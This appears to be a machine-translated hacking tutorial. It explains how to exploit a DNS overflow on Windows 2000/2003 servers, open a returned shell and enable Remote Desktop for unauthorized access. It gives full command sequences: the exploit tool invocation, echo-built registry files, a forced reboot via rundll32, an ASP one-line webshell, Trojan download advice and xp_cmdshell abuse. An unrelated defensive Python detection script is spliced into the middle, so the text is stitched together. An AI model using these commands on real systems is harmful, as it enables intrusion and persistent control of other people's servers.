Using shell to launch remote services

Source: Internet
Author: User

1. Windows 2000 systems

This section briefly describes how to launch a DNS overflow attack. I use dns.exe; running it under CMD shows its usage parameters and other information. Run "dns -s IP" to check whether the target IP address has the DNS overflow vulnerability. In the figure, we can see that the target host has the DNS overflow vulnerability and that the operating system is Windows 2000! Then we launch the overflow attack. After "dns -t 2000all IP 1207" is executed, we are prompted that a shell has been returned on port 1100. "telnet IP 1100" connects to the returned shell. Note that the directory is C:\WINNT\system32, and the Windows 2000 banner is clearly displayed at the top. Next, we write a 3389.reg registry file using the echo command. Copy the following lines one by one into the shell window and press Enter after each to execute:
>3389.reg echo Windows Registry Editor Version 5.00
>>3389.reg echo.
>>3389.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]
>>3389.reg echo "Enabled"="0"
>>3389.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
>>3389.reg echo "ShutdownWithoutLogon"="0"
>>3389.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
>>3389.reg echo "EnableAdminTSRemote"=dword:00000001
>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
>>3389.reg echo "TSEnabled"=dword:00000001
>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
>>3389.reg echo "Start"=dword:00000002
>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
>>3389.reg echo "Start"=dword:00000002
>>3389.reg echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]
>>3389.reg echo "Hotkey"="1"
>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
>>3389.reg echo "PortNumber"=dword:00000D3D
>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
>>3389.reg echo "PortNumber"=dword:00000D3D

The ">" symbol writes to the file, overwriting it: if the file does not exist, it is created; if it exists, the original content is replaced. ">>" is the append write, that is, the content is written after the existing file content. This writes the content into the 3389.reg file! Note that the second line writes a blank line; the reason is that the format of the .reg file must be followed exactly. After writing succeeds, perform the import by running "regedit /s 3389.reg". In this way the registry file is imported into the registry. Note, however, that you must not enter any wrong character in the cmdshell, otherwise it will not execute. We recommend that you first write it in Notepad, make sure it is correct, and then copy it into the shell window for execution. What we need to do next is restart the target server. How can we restart the target server? After testing with many friends, I found the following method appropriate. Run the following code in the cmdshell:
@echo off & cd /d %temp% & echo [version]>{out}.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$>>{out}.inf
echo [DefaultInstall]>>{out}.inf
rundll32 setupapi,%inf% 1 %temp%\{out}.inf

Copy the preceding five lines into the cmdshell in sequence, pressing Enter after each. After all five lines have executed, the server restarts. I will not go into the principle behind it. Of course, there are many ways to restart a server, such as killing key system processes or simulating keystrokes, but I personally think the method recommended above is relatively safe! If nothing goes wrong, wait for the server to restart and connect to the target; you will find that the Remote Desktop service has been enabled. That is how the Remote Desktop service is enabled from the cmdshell returned after overflowing a Windows 2000 system.

2. Windows 2003 systems

Compared with Windows 2000, enabling the Remote Desktop service from the shell on 2003 is easier; at least no restart is required! The first method is to use the echo command to write a 3389.reg file and then import it with "regedit /s 3389.reg" to enable the service. This is relatively simple and similar to the 2000 method described above. Copy the following lines one by one into the shell window and press Enter after each to execute:
>3389.reg echo Windows Registry Editor Version 5.00
>>3389.reg echo.
>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
>>3389.reg echo "fDenyTSConnections"=dword:00000000
>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
>>3389.reg echo "PortNumber"=dword:00000d3d
>>3389.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
>>3389.reg echo "PortNumber"=dword:00000d3d

After completing the preceding steps, execute "regedit /s 3389.reg" to import the file and make it take effect! However, this method is relatively cumbersome. We can also use another, simpler method to enable the Remote Desktop service. Before introducing it, we should first become familiar with the most critical registry value for Remote Desktop Services on the 2003 system.

Under "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"

the value "fDenyTSConnections" is either 1 or 0. When it is 1, the Remote Desktop service is disabled; when it is 0, it is enabled. In other words, you can enable the Remote Desktop service by changing this one registry value from the cmdshell! Fortunately, 2003 has a "reg" command that can do exactly this, hey. Here we look for a server running 2003 and obtain a shell after the overflow in the same way as described above. When we try to connect to Remote Desktop, we find that no connection can be made at all. The following describes how to use the "reg" command to enable the Remote Desktop service. Run:

reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"

We find that the data of the "fDenyTSConnections" value is "0x1", which is 1 in hexadecimal. As mentioned above, if the data is 1, the Remote Desktop service is not enabled. All we need to do is change "0x1" to "0x0"! You cannot directly use "reg add"; you must delete the original value before adding it! Run the following command in the cmdshell:

reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

You will be asked whether you want to delete the registry value fDenyTSConnections; of course, answer Yes. Then run the following command:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0

The prompt reports that the operation succeeded (Figure 9). In this way, the value of "fDenyTSConnections" is changed to "0x0". We can execute:

reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"

to check whether the data has been changed. Now try connecting to the server on 3389 and you will find that the connection succeeds. Add a user and log in. With this, the method for enabling the Remote Desktop service from the cmdshell under 2003 has also been described.
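From the defender's side, the two artifacts this section leaves behind are a dropped 3389.reg file and the state of the Terminal Server key that "reg query" prints. The following Python is an added example, not code from the original article: it parses both formats and reports the values that turn Remote Desktop on or move its listener (fDenyTSConnections, TSEnabled, the TermDD/TermService Start values, PortNumber). The sample inputs are constructed here, and the interpretation of 1 as "denied" and 0 as "allowed" follows the text above.

```python
TERMSRV = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"

# Values the procedure above sets, paired with the data that means "RDP reachable".
WATCHED = {
    "fDenyTSConnections": lambda v: v == 0,      # 0 allows connections, 1 denies them
    "TSEnabled": lambda v: v == 1,               # Windows 2000 master switch
    "Start": lambda v: v == 2,                   # TermDD / TermService set to Automatic
    "PortNumber": lambda v: isinstance(v, int),  # explicit listener port (0xd3d = 3389)
}

def parse_reg_export(text):
    """Map (key, value name) -> data for a 'Windows Registry Editor Version 5.00' file."""
    values, key = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and line.startswith('"') and "=" in line:
            name, _, data = line.partition("=")
            name, data = name.strip('"'), data.strip()
            values[(key, name)] = int(data[6:], 16) if data.startswith("dword:") else data.strip('"')
    return values

def parse_reg_query(text):
    """Map (key, value name) -> data for 'reg query' output ('name  REG_DWORD  0x1')."""
    values, key = {}, None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()
        elif key and len(line.split()) >= 3:
            name, typ, data = line.split(None, 2)
            values[(key, name)] = int(data, 16) if typ == "REG_DWORD" else data.strip()
    return values

def rdp_enabling_findings(values):
    """Return (key, name, data) for entries that turn Remote Desktop on or move its port."""
    return [(k, n, v) for (k, n), v in values.items()
            if (k.startswith(TERMSRV) or k.endswith(("TermDD", "TermService")))
            and n in WATCHED and WATCHED[n](v)]

# Constructed samples: a 3389.reg like the one built above, and a pre-change reg query.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00000d3d
"""
SAMPLE_QUERY = "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\n" \
               "    fDenyTSConnections    REG_DWORD    0x1\n    TSUserEnabled    REG_DWORD    0x0\n"
```

Running rdp_enabling_findings over parse_reg_export(SAMPLE_REG) reports the two enabling entries, while the constructed query output, whose fDenyTSConnections is still 0x1, yields nothing.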

4. Others

Of course, you do not have to enable the Remote Desktop service from the cmdshell after the overflow. You can echo out a VBS file, download a remote-control Trojan, and run it from the cmdshell; once the Trojan is running, it is done. In addition, you can check whether the target IP address hosts a website, find the website directory, and write a Trojan with echo (command: echo "<% execute request("cmd") %>" > WEB path\test.asp), then submit the Trojan, upload the 3389 tool, and enable it that way! In short, there is more than one method; any that reaches the goal is a good one.
*** The following enables it using the database's xp_cmdshell:
exec xp_cmdshell 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'
View the status:
exec xp_cmdshell 'reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"'
